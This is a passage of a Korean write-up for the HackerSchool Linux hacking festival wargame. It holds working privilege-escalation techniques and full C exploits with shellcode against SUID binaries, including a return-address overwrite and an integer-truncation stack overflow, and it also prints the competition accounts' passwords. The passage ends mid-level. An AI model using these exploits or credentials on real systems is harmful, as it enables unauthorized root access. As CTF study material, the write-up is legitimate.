----------------------------------------------------------------------------

* level3 문제

- sendmail을 이용하여 GID를 만들 수 있습니다.

- 혹은 chgrp을 이용하여 GID를 만들 수 있습니다.

----------------------------------------------------------------------------

1111 헉! chgrp..ㅠ_ㅠ;;;

----------------------------------------------------------------------------

chgrp 또는 chown 명령으로 자신이 소유한 파일의 gid를 자신이 속한 그룹들의 gid로

바꿀 수 있다. 그런데, only_uid_shell은 RGID와 EGID를 level3에서 level2로

바꾸었지만 추가 그룹에는 level3가 여전히 남아있었던 것이다!

chgrp 명령을 이용하여 다음과 같이 level3 gid를 획득하였다.

----------------------------------------------------------------------------

bash-2.05b$ id

uid=507(level3) gid=506(level2) groups=507(level3)

bash-2.05b$ cp /bin/bash /tmp/loafers

bash-2.05b$ ls -l /tmp/loafers

-rwxr-xr-x 1 level3 level2 626028 Jun 29 00:34 /tmp/loafers

bash-2.05b$ chgrp level3 /tmp/loafers

bash-2.05b$ ls -l /tmp/loafers

-rwxr-xr-x 1 level3 level3 626028 Jun 29 00:34 /tmp/loafers

bash-2.05b$ chmod +s /tmp/loafers

bash-2.05b$ ls -l /tmp/loafers

-rwsr-sr-x 1 level3 level3 626028 Jun 29 00:34 /tmp/loafers

bash-2.05b$ /tmp/loafers -p

loafers-2.05b$ id

uid=507(level3) gid=506(level2) egid=507(level3) groups=507(level3)

loafers-2.05b$ cat /tmp/shell.c

main()

{

setregid(getegid(),getegid());

setreuid(geteuid(),geteuid());

system("/bin/sh");

}

loafers-2.05b$ gcc -o /tmp/shell /tmp/shell.c

loafers-2.05b$ /tmp/shell

[level3@attack ~]$ id

uid=507(level3) gid=507(level3) groups=507(level3)

[level3@attack ~]$ /bin/register

건투를 빕니다.

축하합니다.!

고유번호를 입력해 주십시오 : #H4SC30267

등록 완료되었습니다.

제 2 서버 : guru.hackerschool.org

ID : guru1

PASSWD : cnrgkgkqslek

[level3@attack ~]$

----------------------------------------------------------------------------

==============================================================================

6 대회서버2: guru1 로그인

6.1 문제 구성

o /home/guru1에 설치된 파일들

[guru1@guru guru1]$ ls -l /home/guru1

합계 32

drwxr-xr-x 2 root root 4096 6월 28 07:53 QUESTION

-rwx--x--- 1 root guru1 11554 6월 27 15:15 new_shell

-rwx--x--- 1 root guru1 12574 6월 27 15:20 reconfirm2

o guru1의 로그인 쉘이 /home/guru1/new_shell로 되어있다.

[guru1@guru guru1]$ grep guru1 /etc/passwd

guru1:x:501:501::/home/guru1:/home/guru1/new_shell

o 로그인 쉘 프로그램 new_shell은 reconfirm2를 실행하고

reconfirm2가 종료되면 /bin/bash 쉘을 실행시키는 구조로 되어있는 것 같다.

o reconfirm2는 Ctrl-C키에 의한 SIGINT 시그널을 무시하는 기능이 추가된

/home/level1/reconfirm의 변형인 것 같다.

reconfirm2는 무한루프를 도는 의미없는 암호인증 프로그램일 것이다.

6.2 공격과정

telnet으로 guru 서버의 guru1 계정에 접속한 후 암호인증 입력부분에서

<Ctrl-]>키를 눌러 telnet 프롬프트 모드로 들어가 send brk 등의 신호를

서버쪽 reconfirm2 프로그램에 보내 reconfirm2 프로그램이 종료되도록 했다.

[root@loafers]# telnet guru.hackerschool.org

Trying 218.149.4.32...

Negotiating binary mode on output.

Connected to guru.hackerschool.org (218.149.4.32).

Escape character is '^]'.

┏━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓

┃ + + + ┃

┃ !!!!! Welcome to HackerSchool Hacking Event !!!!! ┃

┃ + + ┃

┃ "The Fourth Hacking The Linux Server Festival" ┃

┃ ┃

┃ [ 타겟 서버 2에 접속하셨습니다. 좋은 결과 있길 바랍니다. ] ┃

┃ :: 아직 등록 신청을 하지 않으신 분은 해커스쿨 :: ┃

┃ :: 사이트를 통해 등록 하시면 됩니다. :: + ┃

┃+ + ┃

┃ + + ┃

┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛

Password:

Last login: Sat Jun 28 13:22:24 from 211.225.28.155

* 돌아온 2차 암호맨 *

2차 암호를 입력하세요. : 12345678901234567

2차 암호가 틀렸습니다.

2차 암호를 입력하세요. : 123456789012345678

2차 암호가 틀렸습니다.

2차 암호를 입력하세요. : <Ctrl-C누름>2차 암호가 틀렸습니다.

2차 암호를 입력하세요. : <Ctrl-]누름>

telnet> send

need at least one argument for 'send' command

'send ?' for help

telnet> send ?

ao Send Telnet Abort output

ayt Send Telnet 'Are You There'

brk Send Telnet Break

ec Send Telnet Erase Character

el Send Telnet Erase Line

escape Send current escape character

ga Send Telnet 'Go Ahead' sequence

ip Send Telnet Interrupt Process

nop Send Telnet 'No operation'

eor Send Telnet 'End of Record'

abort Send Telnet 'Abort Process'

susp Send Telnet 'Suspend Process'

eof Send Telnet End of File Character

synch Perform Telnet 'Synch operation'

getstatus Send request for STATUS

? Display send options

telnet> send susp

2차 암호가 틀렸습니다.

2차 암호를 입력하세요. :

telnet> send brk

종료 시그널을 보내셨습니다.

[guru1@guru guru1]$ id

uid=501(guru1) gid=501(guru1) groups=501(guru1)

[guru1@guru guru1]$ /bin/register

축하합니다.!

고유번호를 입력해 주십시오 : #H4SC30267

등록 완료되었습니다.

[guru1@guru guru1]$

==============================================================================

7 대회서버2: guru1 -> guru2 권한 획득

7.1 문제 구성

o /home/guru1/QUESTION/vuln은 guru2 SUID된 프로그램으로

vuln 실행파일의 내용을 볼 수 있도록(디버깅이 가능하도록) guru1 그룹사용자에

읽기권한이 설정되어있다.

[guru1@guru guru1]$ ls -l /home/guru1/QUESTION

합계 16

-rw-r--r-- 1 root root 23 6월 28 07:53 hint.txt

-rwsr-x--- 1 guru2 guru1 12119 6월 27 11:54 vuln

[guru1@guru guru1]$ cat /home/guru1/QUESTION/hint.txt

디버깅만이 해결책이다.

o /home/guru1/QUESTION/vuln의 소스프로그램

문제에서는 소스프로그램은 주어지지 않고, vuln 실행프로그램을 역어셈블하여

vuln 프로그램을 분석하는 것이 이 문제의 핵심

vuln 프로그램은 아래와 같이 실행하여 공격하도록 설계되었다.

$ ./vuln message saXffGE5bBIzo "\xde\xad\xff\xbf"

여기서, saXffGE5bBIzo는 crypt("message", "sa")로 생성된 암호문자열이다.

"\xde\xad\xff\xbf"은 vuln 프로그램의 main() 함수의 리턴주소 부분에

덮어쓰여지는 것으로 쉘코드 주소이다.

-----------------------------------------------------------------------------

/* /home/guru1/QUESTION/vuln.c */

#include <stdio.h>

#include <string.h>

#include <crypt.h>

int main(int argc, char *argv[])

{

if (argv[1] != 0) {

printf("%s", argv[1]);

if (strlen(argv[1]) > 100) {

printf("Segmentation fault\n");

return 0;

} else {

printf("\n");

}

} else { /* if (argv[1] != 0) */

printf("Using argv[1]\n");

return 0;

}

if (argv[2] != 0) {

/* crypt()로 argv[1]을 씨앗 "sa"을 사용하여 암호화한 문자열과

* argv[2]가 서로 같으면, main()함수의 리턴주소를 argv[3]에 저장된

* 주소로 바꾼다.

if (strcmp(crypt(argv[1], "sa"), argv[2]) == 0) {

if (argv[3] != 0) {

/* return address = *(int*)argv[3] */

((char *) (&argc-1))[0] = argv[3][0];

((char *) (&argc-1))[1] = argv[3][1];

((char *) (&argc-1))[2] = argv[3][2];

((char *) (&argc-1))[3] = argv[3][3];

}

-----------------------------------------------------------------------------

7.2 공격 과정

어떤 노래가사처럼 처음엔 그냥 버퍼 오버플로우 문제인줄만 알았다.

100문자를 초과하는 첫번째 매개변수에 vuln이 "Segmentation fault" 메시지를

냈으니까.

-------------------------------------------------------------------------------

[guru1@guru QUESTION]$ ./vuln $(printf "%099x" 0)

000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

[guru1@guru QUESTION]$ ./vuln $(printf "%0101x" 0)

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000Segmentation fault

[guru1@guru QUESTION]$

-------------------------------------------------------------------------------

gdb를 vuln 프로그램 코드를 역어셈블하여 C언어 소스를 재구성하였다

(위의 /home/guru1/QUESTION/vuln.c 참조).

----------------------------------------------------------------------------

[guru1@guru QUESTION]$ gdb vuln

GNU gdb Red Hat Linux (5.3post-0.20021129.18rh)

GDB is free software, covered by the GNU General Public License, and you are

welcome to change it and/or distribute copies of it under certain conditions.

Type "show copying" to see the conditions.

There is absolutely no warranty for GDB. Type "show warranty" for details.

This GDB was configured as "i386-redhat-linux-gnu"...

(gdb) disassemble main

Dump of assembler code for function main:

int main( int argc, char *argv[] )

{

0x0804841c <main+0>: push %ebp

0x0804841d <main+1>: mov %esp,%ebp

0x0804841f <main+3>: sub $0x8,%esp

0x08048422 <main+6>: and $0xfffffff0,%esp

0x08048425 <main+9>: mov $0x0,%eax

0x0804842a <main+14>: sub %eax,%esp

if (argv[1] != 0) {

0x0804842c <main+16>: mov 0xc(%ebp),%eax

0x0804842f <main+19>: add $0x4,%eax

0x08048432 <main+22>: cmpl $0x0,(%eax)

0x08048435 <main+25>: je 0x8048495 <main+121>

printf("%s", argv[1]);

0x08048437 <main+27>: sub $0x8,%esp

0x0804843a <main+30>: mov 0xc(%ebp),%eax

0x0804843d <main+33>: add $0x4,%eax

0x08048440 <main+36>: pushl (%eax)

0x08048442 <main+38>: push $0x80485e4

0x08048447 <main+43>: call 0x804834c <printf>

0x0804844c <main+48>: add $0x10,%esp

if (strlen(argv[1]) > 100) {

0x0804844f <main+51>: sub $0xc,%esp

0x08048452 <main+54>: mov 0xc(%ebp),%eax

0x08048455 <main+57>: add $0x4,%eax

0x08048458 <main+60>: pushl (%eax)

0x0804845a <main+62>: call 0x804832c <strlen>

0x0804845f <main+67>: add $0x10,%esp

0x08048462 <main+70>: cmp $0x64,%eax

0x08048465 <main+73>: jbe 0x8048483 <main+103>

printf("Segmentation fault\n");

0x08048467 <main+75>: sub $0xc,%esp

0x0804846a <main+78>: push $0x80485e7

0x0804846f <main+83>: call 0x804834c <printf>

0x08048474 <main+88>: add $0x10,%esp

return 0;

0x08048477 <main+91>: movl $0x0,0xfffffff8(%ebp)

0x0804847e <main+98>: jmp 0x8048532 <main+278>

} else {

printf("\n");

0x08048483 <main+103>: sub $0xc,%esp

0x08048486 <main+106>: push $0x80485fb

0x0804848b <main+111>: call 0x804834c <printf>

0x08048490 <main+116>: add $0x10,%esp

0x08048493 <main+119>: jmp 0x80484b1 <main+149>

}

} else { /* if (argv[1] != 0) */

printf("Using argv[1]\n");

0x08048495 <main+121>: sub $0xc,%esp

0x08048498 <main+124>: push $0x80485fd

0x0804849d <main+129>: call 0x804834c <printf>

0x080484a2 <main+134>: add $0x10,%esp

return 0;

0x080484a5 <main+137>: movl $0x0,0xfffffff8(%ebp)

0x080484ac <main+144>: jmp 0x8048532 <main+278>

}

if (argv[2] != 0) {

0x080484b1 <main+149>: mov 0xc(%ebp),%eax

0x080484b4 <main+152>: add $0x8,%eax

0x080484b7 <main+155>: cmpl $0x0,(%eax)

0x080484ba <main+158>: je 0x8048532 <main+278>

if (strcmp(crypt(argv[1],"sa"), argv[2]) == 0) {

0x080484bc <main+160>: sub $0x8,%esp

0x080484bf <main+163>: mov 0xc(%ebp),%eax

0x080484c2 <main+166>: add $0x8,%eax

0x080484c5 <main+169>: pushl (%eax)

0x080484c7 <main+171>: sub $0xc,%esp

0x080484ca <main+174>: push $0x804860c --> "sa"

0x080484cf <main+179>: mov 0xc(%ebp),%eax

0x080484d2 <main+182>: add $0x4,%eax

0x080484d5 <main+185>: pushl (%eax)

0x080484d7 <main+187>: call 0x804835c <crypt>

0x080484dc <main+192>: add $0x14,%esp

0x080484df <main+195>: push %eax

0x080484e0 <main+196>: call 0x804831c <strcmp>

0x080484e5 <main+201>: add $0x10,%esp

0x080484e8 <main+204>: test %eax,%eax

0x080484ea <main+206>: jne 0x8048532 <main+278>

if (argv[3] != 0) {

0x080484ec <main+208>: mov 0xc(%ebp),%eax

0x080484ef <main+211>: add $0xc,%eax

0x080484f2 <main+214>: cmpl $0x0,(%eax)

0x080484f5 <main+217>: je 0x8048532 <main+278>

// 0x4(%ebp) == return address pointer(rap) == &argc - 1

((char*)rap)[0] = argv[3][0];

0x080484f7 <main+219>: mov 0xc(%ebp),%eax

0x080484fa <main+222>: add $0xc,%eax

0x080484fd <main+225>: mov (%eax),%eax

0x080484ff <main+227>: mov (%eax),%al

0x08048501 <main+229>: mov %al,0x4(%ebp)

((char*)rap)[1] = argv[3][1];

0x08048504 <main+232>: mov 0xc(%ebp),%eax

0x08048507 <main+235>: add $0xc,%eax

0x0804850a <main+238>: mov (%eax),%eax

0x0804850c <main+240>: inc %eax

0x0804850d <main+241>: mov (%eax),%al

0x0804850f <main+243>: mov %al,0x5(%ebp)

((char*)rap)[2] = argv[3][2];

0x08048512 <main+246>: mov 0xc(%ebp),%eax

0x08048515 <main+249>: add $0xc,%eax

0x08048518 <main+252>: mov (%eax),%eax

0x0804851a <main+254>: add $0x2,%eax

0x0804851d <main+257>: mov (%eax),%al

0x0804851f <main+259>: mov %al,0x6(%ebp)

((char*)rap)[3] = argv[3][3];

0x08048522 <main+262>: mov 0xc(%ebp),%eax

0x08048525 <main+265>: add $0xc,%eax

0x08048528 <main+268>: mov (%eax),%eax

0x0804852a <main+270>: add $0x3,%eax

0x0804852d <main+273>: mov (%eax),%al

0x0804852f <main+275>: mov %al,0x7(%ebp)

}

0x08048532 <main+278>: mov 0xfffffff8(%ebp),%eax

0x08048535 <main+281>: leave

0x08048536 <main+282>: ret

0x08048537 <main+283>: nop

}

End of assembler dump.

(gdb)

----------------------------------------------------------------------------

분석을 통해 vuln은 첫번째 매개변수(예: "message") 문자열을 crypt()함수로

"sa" 씨앗과 함께 암호화한 문자열(예: "saXffGE5bBIzo")을 두번째 매개변수로 주고

실행하면 세번째 매개변수의 내용으로 main() 함수의 리턴주소를 바꿔주는

(예: 0xbfffadde) 프로그램이었다.

공격방법은 환경변수에 쉘코드를 넣어 vuln 프로세스 안에 쉘코드를 배치한 후

vuln의 세번째 매개변수에 쉘코드 주소를 주고 실행시키는 것이다.

$ EGG="\x31\xc0\xb0\x31\xcd\x80.../bin/sh을 실행시키는 쉘코드..."

$ ./vuln message saXffGE5bBIzo "\xde\xad\xff\xbf"

o 공격 코드 및 공격

-----------------------------------------------------------------------------

[guru1@guru loafers.]$ cat guru1-exp.c

#include <unistd.h>

#include <string.h>

#include <crypt.h>

char shellcode[] =

// setreuid(geteuid(), geteuid())

"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80"

// execve("/bin/sh", { "/bin/sh", 0 }, 0 )

"\x31\xc0\x50"

"\x68" "//sh"

"\x68" "/bin"

"\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

int main()

{

char *victim_path = "/home/guru1/QUESTION/vuln";

/* 쉘코드의 주소 계산

* o 참고자료

* BUFFER OVERFLOWS DEMYSTIFIED by murat@enderunix.org,

* http://www.enderunix.org/docs/eng/bof-eng.txt

char *env[3] = { shellcode, 0 };

int ret = 0xbffffffa - strlen(victim_path) - strlen(shellcode);

printf("ret = %p\n", ret);

int buf[2] = { ret, 0 };

char *argv[] = { victim_path, "x", crypt("x", "sa"), (char*)buf, 0 };

execve(victim_path, argv, env);

}

[guru1@guru loafers.]$ gcc -o guru1-exp guru1-exp.c

[guru1@guru loafers.]$ ./guru1-exp

ret = 0xbfffffb9

sh-2.05b$ id

uid=502(guru2) gid=501(guru1) groups=501(guru1)

sh-2.05b$ /bin/register

축하합니다.!

고유번호를 입력해 주십시오 : #H4SC30267

등록 완료되었습니다.

guru2의 패스워드는 woaldlTek입니다.

sh-2.05b$

-----------------------------------------------------------------------------

==============================================================================

8 대회서버2: guru2 -> guru3 권한 획득

8.1 문제 구성

o /home/guru2/QUESTION/vuln은 guru3 SUID 프로그램으로 버퍼오버플로우 가능성을

지닌 프로그램이다.

[guru2@guru QUESTION]$ ls -l /home/guru2/QUESTION

합계 20

-r-sr-x--- 1 guru3 guru2 12376 6월 28 08:39 vuln

-rw-r--r-- 1 root root 489 6월 28 08:39 vuln.c

o /home/guru2/QUESTION/vuln.c

--------------------------------------------------------------------------

[guru2@guru QUESTION]$ cat vuln.c

#include <stdio.h>

#include <stdlib.h>

main(int argc, char *argv[])

{

char count, temp[222];

char *user;

char max[100];

count = strlen(getenv("HOSTNAME"));

if (count > 100) {

printf(" * yo check it out!\n");

return 0;

}

user = malloc(strlen(getenv("HOSTNAME")));

strncpy(max, getenv("HOSTNAME"), strlen(getenv("HOSTNAME")));

strcpy(user, getenv("HOSTNAME"));

printf("\n\n\t- Hackerschool Hacking Server\n");

printf("\t- Server Info \n\n\n");

printf("\tHOSTNAME : %s\n\n", user);

}

--------------------------------------------------------------------------

8.2 vuln.c 분석

o vuln.c 프로그램의 특징

- 다음 코드에서 동적 할당된 user 버퍼에는 off-by-one 오버플로우가 발생한다.

user = malloc(strlen(getenv("HOSTNAME")));

strcpy(user, getenv("HOSTNAME"));

user = malloc(strlen(getenv("HOSTNAME")) + 1); 이 옳다.

위 코드에서는 strcpy() 호출에 의해 user에 할당된 메모리 덩어리(chunck)의

다음 덩어리의 prevsize 값의 하위 1바이트를 0으로 덮어쓴다(off-by-one).

하지만 free() 함수 호출없이 프로그램이 종료되므로 이 오류로 공격당하지는

않는다.

* 참고자료

Heap off by one by qitest1, http://bespin.org/~qitest1/txt/heap_off_by_one.txt.asc

- count 변수는 char 형으로 HOSTNAME 환경변수 문자열이 128자 이상이 되면

정수 오버플로우 문제를 일으킨다. 이는 char 형은 1바이트(8비트)로 표현되는

부호있는 정수로 해석되며 -128(10000000) ~ +127(01111111)까지의 수를 표시한다.

예를 들면 다음 대입문에서 count에는 4660(= 0x1234)가 아니라 52(= 0x34)가

대입된다. 하위 1바이트(0x34)를 제외한 나머지 상위부분은 절단되어 버려진다.

char count = 4660;

그리고, 다음 대입문에서 count의 값은 -128이 된다.

(int)+128 == 0x00000080, (char)-128 == 0x80이므로 절단현상에 의해

int형 정수 0x00000080(= +128)을 char형 정수로 변환하면 0x80(= -128)이

된다. 즉, 정수 오버플로우에 의해 정수 값의 부호가 바뀔 수도 있다.

char count = +128; // count 값은 -128이 된다.

* 참고자료

정수형 오버플로우의 기본, blexim, http://khdp.org/docs/trans_doc/phrack-60-10.txt

HOSTNAME 환경변수 문자열의 길이를 len이라 할때,

len >= 128이면서 100 < (len % 256) < 128이 아닌 len 값들은

"if (count > 100)"의 버퍼 오버플로우 검사를 무사히 통과하여

strncpy(max, getenv("HOSTNAME"), strlen(getenv("HOSTNAME")));에 의해

char max[100] 버퍼에 오버플로우를 일으킨다.

char count;

count = strlen(getenv("HOSTNAME"));

if (count > 100) {

printf(" * yo check it out!\n");

return 0;

}

char max[100];

strncpy(max, getenv("HOSTNAME"), strlen(getenv("HOSTNAME")));

- user 지역변수는 max 지역변수보다 먼저 선언되었으므로 스택 메모리에서

user는 max보다 상위 메모리에 위치한다. strncpy(max, getenv...)에 의해

max[100] 버퍼가 오버플로우를 일으킬 때 문자열 포인터 user의 값이 수정된다.

이것은 strncpy(max, ...)에 뒤이어지는 strcpy(user, ...) 호출에서

수정된 포인터 user가 엉뚱한 곳을 가리킨다면 Segmentation fault를

발생시키거나 공격에 필요한 코드를 지워버려 공격이 실패할 수 있다.

char *user;

char max[100];

strncpy(max, getenv("HOSTNAME"), strlen(getenv("HOSTNAME")));

strcpy(user, getenv("HOSTNAME"));

그러므로, max 버퍼를 오버플로우 시킬 때 user 포인터 값이 공격에 방해가 되지

않는 주소로 덮어써지도록 한다. 아래 공격 코드에서는 이 주소가 환경변수

HOSTNAME의 문자열 값의 주소가 되도록 했다.

그러면, strcpy(user, getenv("HOSTNAME"))은 자신을 스스로에게 복사하는 하는

셈이된다. 환경변수 HOSTNAME이 위치한 주소는 정확히 계산할 수 있다.

- max 버퍼의 오버플로우에 의해 스택 상단의 환경변수 포인터 배열이 깨지지

않도록 버퍼 오버플로우의 길이를 조절해야한다.

그러므로, 버퍼오버플로우는 main() 함수의 리턴주소를 덮어쓸 정도로만

조절하기로 했다.

스택 메모리

| | 하위주소

| max | |

| ... | |

| user | V

| ... |

| main()의 리턴주소 | 버퍼

| ... | 오버

| argv[0] 매개변수 | 플로우

| argv[1] 벡터 | 방향

| argv[2] |

| 0 | |

+---- envp[0] 환경변수 | x 환경변수 포인터가 손상되면

| | envp[1] 벡터 | x getenv("HOSTNAME") 호출에서

| | envp[2] | | Segmentation fault를 일으킬

| | 0 | V 수 있다.

| | ... |

+-->|"HOSTNAME=xxx....."|

|"shellcode\x31\x.."|

| | 상위주소

8.2 공격 코드 작성

o max 버퍼와 main()의 리턴주소 위치 사이의 간격 계산

리턴주소 위치 - max의 위치 = 380

user의 위치 - max의 위치 = 124

----------------------------------------------------------------------------

[guru2@guru QUESTION]$ gdb vuln

GNU gdb Red Hat Linux (5.3post-0.20021129.18rh)

GDB is free software, covered by the GNU General Public License, and you are

welcome to change it and/or distribute copies of it under certain conditions.

Type "show copying" to see the conditions.

There is absolutely no warranty for GDB. Type "show warranty" for details.

This GDB was configured as "i386-redhat-linux-gnu"...

(gdb) disassemble main

Dump of assembler code for function main:

0x08048430 <main+0>: push %ebp

0x08048431 <main+1>: mov %esp,%ebp

0x08048433 <main+3>: sub $0x188,%esp

0x08048439 <main+9>: and $0xfffffff0,%esp

0x0804843c <main+12>: mov $0x0,%eax

0x08048441 <main+17>: sub %eax,%esp

0x08048443 <main+19>: sub $0xc,%esp

0x08048446 <main+22>: push $0x8048620

0x0804844b <main+27>: call 0x8048310 <getenv>

0x08048450 <main+32>: add $0x4,%esp

0x08048453 <main+35>: push %eax

0x08048454 <main+36>: call 0x8048330 <strlen>

0x08048459 <main+41>: add $0x10,%esp

0x0804845c <main+44>: mov %al,0xfffffff7(%ebp)

0x0804845f <main+47>: cmpb $0x64,0xfffffff7(%ebp)

0x08048463 <main+51>: jle 0x8048484 <main+84>

0x08048465 <main+53>: sub $0xc,%esp

0x08048468 <main+56>: push $0x8048629

0x0804846d <main+61>: call 0x8048350 <printf>

0x08048472 <main+66>: add $0x10,%esp

0x08048475 <main+69>: movl $0x0,0xfffffe84(%ebp)

0x0804847f <main+79>: jmp 0x8048541 <main+273>

0x08048484 <main+84>: sub $0xc,%esp

0x08048487 <main+87>: push $0x8048620

0x0804848c <main+92>: call 0x8048310 <getenv>

0x08048491 <main+97>: add $0x4,%esp

0x08048494 <main+100>: push %eax

0x08048495 <main+101>: call 0x8048330 <strlen>

0x0804849a <main+106>: add $0x4,%esp

0x0804849d <main+109>: push %eax

0x0804849e <main+110>: call 0x8048320 <malloc>

0x080484a3 <main+115>: add $0x10,%esp

0x080484a6 <main+118>: mov %eax,0xffffff04(%ebp)

0x080484ac <main+124>: sub $0x4,%esp

0x080484af <main+127>: sub $0x8,%esp

0x080484b2 <main+130>: push $0x8048620

0x080484b7 <main+135>: call 0x8048310 <getenv>

0x080484bc <main+140>: add $0x4,%esp

0x080484bf <main+143>: push %eax

0x080484c0 <main+144>: call 0x8048330 <strlen>

0x080484c5 <main+149>: add $0xc,%esp

0x080484c8 <main+152>: push %eax

0x080484c9 <main+153>: sub $0x4,%esp

0x080484cc <main+156>: push $0x8048620

0x080484d1 <main+161>: call 0x8048310 <getenv>

0x080484d6 <main+166>: add $0x8,%esp

0x080484d9 <main+169>: push %eax

이 부분이 strncpy( max, ... )의 매개변수 max를 스택에

넣는 곳이다.

0x080484da <main+170>: lea 0xfffffe88(%ebp),%eax

0x080484e0 <main+176>: push %eax

0x080484e1 <main+177>: call 0x8048360 <strncpy>

0x080484e6 <main+182>: add $0x10,%esp

max의 위치 = 0xfffffe88(%ebp) == %ebp - 376.

main()의 리턴주소 위치 = %ebp + 4

리턴주소 위치 - max의 위치 = 380

아래 코드는 strcpy(user, getenv("HOSTNAME));이다.

0x080484e9 <main+185>: sub $0x8,%esp

0x080484ec <main+188>: sub $0x4,%esp

0x080484ef <main+191>: push $0x8048620

0x080484f4 <main+196>: call 0x8048310 <getenv>

0x080484f9 <main+201>: add $0x8,%esp

0x080484fc <main+204>: push %eax

0x080484fd <main+205>: pushl 0xffffff04(%ebp) --> &user == %ebp - 252

0x08048503 <main+211>: call 0x8048370 <strcpy> &user - &max = 376 - 252

0x08048508 <main+216>: add $0x10,%esp = 124

0x0804850b <main+219>: sub $0xc,%esp

0x0804850e <main+222>: push $0x8048640

0x08048513 <main+227>: call 0x8048350 <printf>

0x08048518 <main+232>: add $0x10,%esp

0x0804851b <main+235>: sub $0xc,%esp

0x0804851e <main+238>: push $0x8048662

0x08048523 <main+243>: call 0x8048350 <printf>

0x08048528 <main+248>: add $0x10,%esp

0x0804852b <main+251>: sub $0x8,%esp

0x0804852e <main+254>: pushl 0xffffff04(%ebp)

0x08048534 <main+260>: push $0x8048675

0x08048539 <main+265>: call 0x8048350 <printf>

0x0804853e <main+270>: add $0x10,%esp

0x08048541 <main+273>: mov 0xfffffe84(%ebp),%eax

0x08048547 <main+279>: leave

0x08048548 <main+280>: ret

0x08048549 <main+281>: nop

0x0804854a <main+282>: nop

0x0804854b <main+283>: nop

End of assembler dump.

(gdb)

----------------------------------------------------------------------------

o 공격 코드 작성 및 공격

----------------------------------------------------------------------------

[guru2@guru loafers.]$ cat guru2-exp.c

#include <unistd.h>

#include <string.h>

char shellcode[] =

"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80"

"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50"

"\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

int main()

{

char *victim_path = "/home/guru2/QUESTION/vuln";

/* Calculating address of shellcode */

int ret = 0xbffffffa - strlen(victim_path) - strlen(shellcode);

printf("ret = %p\n", ret);

/* HOSTNAME=[getenv("HOSTNAME):4byte]x(380/4) + [쉘코드주소:4byte]

* strlen("HOSTNAME") == 384, (char)384 == -128 < 100

char hostname[512];

strcpy(hostname, "HOSTNAME=");

int *p = (int *)(hostname + 9); /* 9 == strlen("HOSTNAME=") */

while (p < (int *)(hostname + 9 + 380))

*p++ = ret - 384 - 1; /* == getenv("HOSTNAME") */

*p++ = ret;

*p = 0;

char *argv[] = { victim_path, 0 };

char *env[3] = { hostname, shellcode, 0 };

execve(victim_path, argv, env);

}

[guru2@guru loafers.]$ gcc -o guru2-exp guru2-exp.c

[guru2@guru loafers.]$ ./guru2-exp

ret = 0xbfffffb9

- Hackerschool Hacking Server

- Server Info

HOSTNAME : 8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�뮈

sh-2.05b$ id

uid=503(guru3) gid=502(guru2) groups=502(guru2)

sh-2.05b$ /bin/register

축하합니다.!

고유번호를 입력해 주십시오 : #H4SC30267

등록 완료되었습니다.

guru3의 패스워드는 whrmaaksej입니다.

sh-2.05b$

----------------------------------------------------------------------------

==============================================================================

9 대회서버2: guru3 -> root 권한 획득

o 참고

이 문제는 loafers가 정확히 이해하고 제대로 재구성하였는지 확실하지 않다.

loafers가 구축한 실험환경에서는 공격이 성공했지만 실제 대회서버2의 vuln에

대한 공격은 성공을 확인하지 못했다. 대회종료 후 loafers는 TCP 프로토콜에 대해

좀 더 공부한 후 이 문제를 재구성한 것이다.

9.1 문제 구성

o /home/guru3/QUESTION에 설치된 파일

[guru3@guru guru3]$ ls -l /home/guru3/QUESTION

합계 20

-rwxr-xr-x 1 root root 13243 6월 29 01:14 vuln

-rw----r-- 1 root root 1131 6월 29 01:14 vuln.c

[guru3@guru guru3]$ cat /home/guru3/QUESTION/vuln.c

#include <stdio.h>

#include <sys/socket.h>

#include <sys/types.h>

#include <arpa/inet.h>

#include <linux/ip.h>

#include <linux/tcp.h>

#include <dumpcode.h>

int main() {

char buffer[20];

int recv_socket, len; char recv_packet[100];

struct sockaddr_in target_address;

struct tcphdr *tcp_header; // tcp 헤더 구조체의 포인터 변수 struct iphdr

tcp_header = (struct tcphdr *)(recv_packet + 20); // ip 헤더 뒤쪽 부분을 가리키도록 함.

char *string = recv_packet+40; // data 부분을 가리키도록 함.

recv_socket = socket( AF_INET, SOCK_RAW, IPPROTO_TCP );

len = sizeof( target_address );

while(1){

recvfrom( recv_socket, recv_packet, 100, 0, (struct sockaddr *)&target_address, &len );

// 발신자의 IP가 123.234.123.234과 같은지 검사.

if( strcmp( inet_ntoa(target_address.sin_addr), "123.234.123.234" ) == 0 ){

printf("This is correct IP address\n");

// 접속 포트가 777와 같은지 검사.

if( ntohs(tcp_header->dest) == 777 ){

printf( "I received attacker's packet.\n" );

if(fork()==0){

dumpcode(string, 48);

printf("\n\n");

strcpy(buffer, string);

break;

}

----------------------------------------------------------------------------

- vuln.c는 raw socket 모드로 패킷을 경청하는 프로그램으로

송신지 IP가 123.234.123.234이고 목적지 포트가 777로 설정된 패킷의

메시지를 버퍼에 복사하면서 오버플로우를 일으킴

- 원격지에서 송신지 IP와 메시지 내용을 조작한 TCP 패킷을 생성하여

대회서버2에 보내는 문제

o /home/guru3/QUESTION/vuln이 root 권한으로 실행됨

-------------------------------------------------------------------------------

[guru3@guru QUESTION]$ ps aux

root 25034 0.0 0.1 1340 308 tty1 S 01:14 0:02 ./vuln

root 29945 0.0 0.0 0 0 tty1 Z 04:15 0:00 [vuln <defunct>]

root 29994 0.0 0.0 0 0 tty1 Z 04:17 0:00 [vuln <defunct>]

-------------------------------------------------------------------------------

* 위에서 <defunct>된 vuln 프로세스는 공격에 의해 fork된 ./vuln의 자식

